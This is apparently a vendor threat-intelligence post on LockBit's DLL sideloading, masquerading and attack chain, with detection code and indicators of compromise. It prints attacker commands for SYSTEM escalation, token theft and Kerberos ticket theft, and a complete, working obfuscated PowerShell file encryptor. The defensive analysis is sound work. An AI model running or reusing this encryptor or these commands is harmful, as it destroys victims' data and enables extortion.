Unmasking LockBit: A Deep Dive into DLL Sideloading and Masquerading Tactics
Stealthy TTPs help ransomware attackers remain under the radar.
Attackers deploying the LockBit ransomware have continually evolved their tactics, techniques, and procedures (TTPs) to evade detection and maximize impact. Among their sophisticated arsenal, two techniques stand out for their effectiveness in concealing malicious activity: DLL sideloading and masquerading. This blog post delves into how attackers deploying LockBit leverage these methods to establish persistence and blend into legitimate system processes.
While this blog details methods used in LockBit ransomware attacks specifically, similar methods are used by attackers deploying other malicious payloads as well.
DLL sideloading: Exploiting trust for malicious gain
DLL sideloading is a stealthy attack technique where a legitimate application is tricked into loading a malicious Dynamic Link Library (DLL) instead of a legitimate one. This often occurs when a legitimate application attempts to load a DLL from an unsecured location or when the malicious DLL has the same name as a legitimate one but is placed in a directory that is searched earlier by the operating system.
LockBit has been observed using DLL sideloading to execute its payload. Here's a simplified breakdown of the process:
- Legitimate application as a loader: LockBit often bundles its malicious DLL with a legitimate, digitally signed application. This application, when executed, will attempt to load specific DLLs required for its functionality.
- Malicious DLL placement: The LockBit threat actors place their malicious DLL (often with a filename identical to a legitimate one) in a directory that is searched by the legitimate application before the legitimate DLL's actual location.
- Execution of malicious code: When the legitimate application is launched, it inadvertently loads and executes the malicious DLL, allowing the ransomware to initiate its encryption process or other nefarious activities under the guise of a trusted program.
This technique is particularly effective because it leverages the trust placed in legitimate applications, making it harder for traditional security solutions to differentiate between legitimate and malicious activity.
Masquerading: Blending in with legitimate processes
Masquerading refers to the technique of disguising malicious files or processes to appear as legitimate system files or applications. LockBit actors employ various masquerading tactics to avoid detection and maintain persistence on compromised systems.
Common masquerading techniques observed in LockBit attacks include:
- Renaming malicious files: Threat actors rename their ransomware executables or associated files to common system filenames (e.g., svchost.exe, explorer.exe, cmd.exe). This makes it difficult for users or even some security tools to distinguish them from legitimate system processes.
- Spoofing process names: LockBit may also attempt to manipulate process names to appear as legitimate services or applications running on the system. This can be achieved by injecting code into legitimate processes or by using specific APIs to alter process information.
- Using legitimate icons: To further enhance their disguise, LockBit samples have been found to use icons identical to those of legitimate Windows applications, making the malicious files appear less suspicious to a casual observer.
- Leveraging legitimate directories: Malicious files are often placed in directories commonly used by legitimate system files, such as C:\Windows\System32 or C:\ProgramData, further aiding in their camouflage.
In recent LockBit cases, attackers have been observed leveraging trusted applications alongside malicious DLLs (disguised with legitimate names) placed in the same directory. The technique relies on DLL side-loading, where the legitimate application inadvertently loads the malicious DLL. Examples include:
- Jarsigner.exe and jli.dll
Both are parts of the Java platform. Jarsigner.exe naturally loads jli.dll. In this case, the attacker placed a legitimate jarsigner.exe and a malicious jli.dll (disguised with the correct name) in the same folder. When jarsigner.exe was executed, it loaded the malicious jli.dll, which acted as a loader for further payload execution.
- MpCmdRun.exe and mpclient.dll
These components belong to Windows Defender. The attacker dropped a renamed MpCmdRun.exe (masquerading as <company_domain_name>.exe) along with a malicious mpclient.dll. When <company_domain_name>.exe was run, it loaded mpclient.dll, which contained the LockBit ransomware payload and began encrypting files.
- Clink_x86.exe and clink_dll_x86.dll
These are part of the Clink tool, which integrates with cmd.exe to enhance command-line input using its own Readline-based features. The attacker dropped a renamed Clink_x86.exe (again masquerading as <company_domain_name>.exe) alongside a malicious clink_dll_x86.dll. Upon execution, <company_domain_name>.exe loaded the malicious DLL clink_dll_x86.dll, triggering the LockBit ransomware payload and starting file encryption.
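Triage logic for the two techniques described above, written as an added example rather than code from the original post: it scores image-load events for masquerading (a system binary name running from the wrong directory) and for sideloading (one of the DLLs from the host/DLL pairs above resolved from somewhere other than its normal home, typically next to the host EXE in a user-writable folder). The expected directories, the event format and the sample events are assumptions constructed for the example.

```python
import ntpath
# Reference data (assumption, illustrative paths): where the DLL of each host/DLL
# pair from the post normally lives, and where masqueraded system binaries belong.
EXPECTED_DLL_DIR = {"jli.dll": r"c:\program files\java\jdk\bin",
                    "mpclient.dll": r"c:\program files\windows defender",
                    "clink_dll_x86.dll": r"c:\program files (x86)\clink"}
SYSTEM_EXE_DIR = {"svchost.exe": r"c:\windows\system32",
                  "explorer.exe": r"c:\windows", "cmd.exe": r"c:\windows\system32"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")

def _dir(path):
    return ntpath.dirname(path.lower())
def _name(path):
    return ntpath.basename(path.lower())

def triage_image_load(event):
    """Return finding strings for one image-load event (process, dll, signing)."""
    findings = []
    proc, dll = event["process"], event["dll"]
    pname, dname = _name(proc), _name(dll)
    # Masquerading: a well-known system binary name running from the wrong directory.
    if pname in SYSTEM_EXE_DIR and _dir(proc) != SYSTEM_EXE_DIR[pname]:
        findings.append(f"masquerade: {pname} from {_dir(proc)}")
    # Sideloading: a known-pair DLL resolved from somewhere other than its home,
    # typically next to the host EXE in a user-writable directory.
    if dname in EXPECTED_DLL_DIR and _dir(dll) != EXPECTED_DLL_DIR[dname]:
        where = "host exe dir" if _dir(dll) == _dir(proc) else "foreign dir"
        writable = any(m in _dir(dll) + "\\" for m in USER_WRITABLE)
        findings.append(f"sideload: {dname} from {where}"
                        + (" (user-writable)" if writable else ""))
    # A signed host pulling in an unsigned copy of one of its own DLLs.
    if (event.get("host_signed") and not event.get("dll_signed", True)
            and dname in EXPECTED_DLL_DIR):
        findings.append(f"unsigned {dname} loaded by signed {pname}")
    return findings

# Constructed sample events modelled on the post's cases; "company-domain.exe"
# stands in for the renamed MpCmdRun.exe the post calls <company_domain_name>.exe.
SAMPLE_EVENTS = [
    {"process": r"C:\Users\test\AppData\Roaming\company-domain.exe",
     "dll": r"C:\Users\test\AppData\Roaming\mpclient.dll",
     "host_signed": True, "dll_signed": False},
    {"process": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "dll": r"C:\Program Files\Windows Defender\mpclient.dll",
     "host_signed": True, "dll_signed": True},
    {"process": r"C:\ProgramData\svchost.exe", "dll": r"C:\Windows\System32\ntdll.dll",
     "host_signed": False, "dll_signed": True},
]

def triage_all(events=SAMPLE_EVENTS):
    return {e["process"]: triage_image_load(e) for e in events}
```

The legitimate Defender load in the second event produces no finding, which is the point: the signal is the DLL's location relative to its host and its normal home, not the DLL name itself.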
In the following section, we’ll take a closer look into how the LockBit attacker is leveraging these techniques at various stages of the attack chain in recently seen attacks.
Attack chain: Initial access
A recent LockBit attack started with the attackers accessing machines through well-known remote access tools such as MeshAgent and TeamViewer. Once the attackers had access to the remote machines, files were uploaded directly and executed.
Attack chain: Privilege escalation
NSSM: NSSM was used to run a remote access Trojan (RAT) as a service. NSSM is a utility that can launch any ordinary application as a Windows service. NSSM created a service for the RAT binary, named edge.exe.exe, and started the service. The same RAT was also seen renamed as o.exe.
PsExec: PsExec was used to run cmd.exe as the SYSTEM user via the -s parameter:
PsExec64.exe -s -i cmd
Attack chain: Discovery
Net.exe, nltest.exe and query.exe were used to get details about domain users, domain groups, and group permissions:
net user <username>
net group "domain computers" /do
nltest /domain_trusts
query user
Attack chain: Credential theft
TokenUtils.exe was used to steal tokens from all users and to launch applications with those tokens. In this case the attacker used the "NT AUTHORITY\SYSTEM" token to run whoami and cmd.exe:
TokenUtils.exe ListTokens
TokenUtils.exe Execute -u "NT AUTHORITY\SYSTEM" -e whoami -c
TokenUtils.exe Execute -u "NT AUTHORITY\SYSTEM" -e cmd.exe -c
Sd1.exe was also used to steal Kerberos tickets:
Sd1 <sub-domain>.<domain>.local <domain>.local krbtgt
Sd1 <sub-domain>.<domain>.local <domain> <domain>\<domain user>

Attack chain: Lateral movement
Group Policy was used to drop payloads on machines and execute them. Multiple files were dropped, including ransomware payloads (DLL and EXE), trusted executables for DLL sideloading, and PowerShell scripts.
Attack chain: Impact
The attackers also ran an obfuscated PowerShell command that encrypts certain file types:
function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = '<RSAKeyValue><Modulus>lo233NH3Nv8AgTnugGImrUa13XuzHYyGSkgsgLrvz0y7MYix+U1eIYdF7BarhqKJXT1HZcijWzdz
2BzdZ1uvoSr9/41CMCAdkV1ISWuzdnQ2LLGdP1FaEvFls+p8P/hlBJd+D6WoFceRZ0QzRfj0qikaXT89KSZlJFrZg6Leo
jGvorzw7UVNwR+uXvBWKx+Ez4hNmxa2cLXyhmHA4QrUZ/xsG1u0j9Fk6Mqc4q6Vfb1x9NHR9W+caJbRs1RQENAkY2TqIRVjS5qIInB57gHxbuBp6WbBmtSJUJHnVqDu77U0BD80IYL3ggzAdazWoBarX81ZIRjZPb6+Ehmc/FL8+Q==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include *.pdf,*.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $_ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if 
($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"}
As described above, they also used DLL sideloading to launch the encryptor, and dropped several ransomware executables that were run directly.
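Detection logic for the attack chain above (privilege escalation via PsExec -s and NSSM, discovery via nltest, net and query, credential theft via TokenUtils and Sd1), written as an added example that is not part of the original post. The rules correlate per host, so a lone "query user" from an administrator does not fire while a host that shows two or more stages does; the pipe-separated log format, the rule patterns and the sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Rules keyed by the stage names the post uses; each pattern is matched
# case-insensitively against the full command line of a process-creation event.
RULES = {
    "privilege escalation": [
        r"\bpsexec(64)?\.exe\b.*\s-s\b",          # PsExec -s: spawn as SYSTEM
        r"\bnssm(\.exe)?\s+install\b",             # NSSM wrapping a binary as a service
    ],
    "discovery": [
        r"\bnltest(\.exe)?\s+/domain_trusts\b",
        r'\bnet(\.exe)?\s+group\s+"domain computers"',
        r"\bquery(\.exe)?\s+user\b",
    ],
    "credential theft": [
        r"\btokenutils(\.exe)?\s+(listtokens|execute)\b",
        r"\bsd1(\.exe)?\s+\S+\s+\S+\s+krbtgt\b",    # Sd1 <sub-domain> <domain> krbtgt
    ],
}
COMPILED = {s: [re.compile(p, re.I) for p in ps] for s, ps in RULES.items()}

def parse_line(line):
    """Constructed log format (assumption): '<time>|<host>|<user>|<command line>'."""
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}

def match_stages(cmd):
    """Stages whose rules fire on one command line, in RULES order."""
    return [s for s, ps in COMPILED.items() if any(p.search(cmd) for p in ps)]

def correlate(lines):
    """Per host, the first command seen for each stage; report hosts with >= 2 stages.
    A single 'query user' is routine admin work; the chain is what matters."""
    seen = defaultdict(dict)
    for line in lines:
        ev = parse_line(line)
        for stage in match_stages(ev["cmd"]):
            seen[ev["host"]].setdefault(stage, ev["cmd"])
    return {host: stages for host, stages in seen.items() if len(stages) >= 2}

# Constructed sample log modelled on the commands in the post.
SAMPLE_LOG = [
    r"2025-01-01T10:00:00|WS01|corp\jdoe|C:\Tools\PsExec64.exe -s -i cmd",
    r"2025-01-01T10:01:00|WS01|NT AUTHORITY\SYSTEM|nltest /domain_trusts",
    r'2025-01-01T10:01:30|WS01|NT AUTHORITY\SYSTEM|net group "domain computers" /do',
    r'2025-01-01T10:02:00|WS01|NT AUTHORITY\SYSTEM|TokenUtils.exe Execute -u "NT AUTHORITY\SYSTEM" -e whoami -c',
    r"2025-01-01T11:00:00|WS02|corp\admin|query user",
]
```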

While these TTPs were seen in a specific campaign targeting one victim, similar TTPs could easily be used in future attacks to deploy LockBit or other malicious payloads.
The LockBit ransomware-as-a-service (RaaS) was run by Syrphid, a prominent cybercrime group. The U.S. Federal Bureau of Investigation (FBI) believes the group was responsible for extorting up to $500 million from victims since it first became active in 2019. However, Syrphid was disrupted in two law enforcement operations in 2024, which included the indictment in the U.S. of the group’s alleged ringleader, Dimitry Khoroshev (aka LockBitSupp). The builder for LockBit 3.0 was also subsequently leaked. This means that the ransomware could now be deployed by any threat actor, as it is no longer under the control of its original developers.
Protection / Detection
Symantec EDR Incident AI Summary



Carbon Black EDR Alerts
The following alerts were generated on Carbon Black EDR for ransomware activity.

File-based protection
- Ransom.LockBit
- Heur.AdvML.B!100
- Heur.AdvML.C
- Trojan.Gen.9
- Trojan.Gen.MBT
- PUA.Gen.2
- Ransom.Blackmatter!gm1
- Trojan Horse
- Hacktool.Gen
Behavior-based protection
- SONAR.Ransomware!g3
- SONAR.Ransomware!g1
- SONAR.RansomGen!gen4
- SONAR.SuspLaunch!g559
- AGR.Terminate!g2
Adaptive-based protection
- ACM.Psxec-Lnch!g1 - PSEXEC Launch
- ACM.Psxsv-Net!g1 - PSEXEC running net commands
- ACM.Psxsv-Quser!g1 - PSEXEC running Quser commands
- ACM.Psxsv-Untrst!g1 - PSEXEC running untrusted process
- ACM.Untrst-RLsass!g1 - Untrusted process accessing LSASS
Network-based protection
- 32939 - Audit: TeamViewer Remote Access Activity
- 32940 - Audit: TeamViewer Remote Access Activity 2
- 12393 - Informational: MeshAgent Activity
- C&C WebPulse Categorization:
- Categories: Malicious Sources/Malnets(43)
- Risk Level: 9 (Increased evidence of maliciousness)
Carbon Black protection
- Process nltest.exe was detected by the report "Discovery - NLTest Domain Trust Enumeration" in watchlist "Carbon Black Advanced Threats"
- Process powershell.exe was detected by the report "Discovery - AMSI - AntiVirus Fingerprinting" in watchlist "AMSI Threat Intelligence"
- A known virus was detected running
- A known virus was detected in file c:\users\test\appdata\roaming\mpclient.dll
- A known virus (Malware: Heur.AdvML.B!100) was detected in file c:\users\test\appdata\roaming\clink_dll_x86.dll
- The application explorer.exe dropped a known virus onto the device
- The application <domain>.exe renamed the extension of a user data file from doc to x2anylock. This technique is commonly associated with ransomware attacks
Indicators of compromise
File indicators
f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97 - Nssm.exe
5ca8e1d001a2c3800afce017424ca471f3cba41f9089791074a9cb7591956430 - Tokenutils.exe
0201a6dbe62d35b81d7cd7d7a731612458644b5e3b1abe414b0ea86d3266ab03 - sd1.exe
1cd644b750884906b707419c8f40598c04f1402e4e93cbf4a33f3254846dc870 - <domain>.exe (masqueraded MpCmdRun.exe)
edcf76600cd11ef7d6a5c319087041abc604e571239fe2dae4bca83688821a3a - mpclient.dll
011b31d7e12a2403507a71deb33335d0e81f626d08ff68575a298edac45df4cb - <domain>access.exe (masqueraded clink_x86.exe)
4147589aa11732438751c2ecf3079fb94fa478a01ac4f08d024fb55f7ffb52f3 - clink_dll_x86.dll
10f1a789e515fdaf9c04e56b8a5330cfb1995825949e6db8c9eaba4ea9914c97 - jarsigner.exe
086567b46fca2a27d404d9b61bdb482394e1591dc13f1302b813bb2ddf5e54cf - jli.dll
6285d32a9491a0084da85a384a11e15e203badf67b1deed54155f02b7338b108 - nxc.exe
785e5aaecd9430451f4b0bad637658e6afeea1e722b3d0dd674cb6a11f4ce286 - encth.exe, dwa.exe
24480dbe306597da1ba393b6e30d542673066f98826cc07ac4b9033137f37dbf - o.exe, edge.exe.exe
Network indicators
msupdate[.]updatemicfosoft[.]com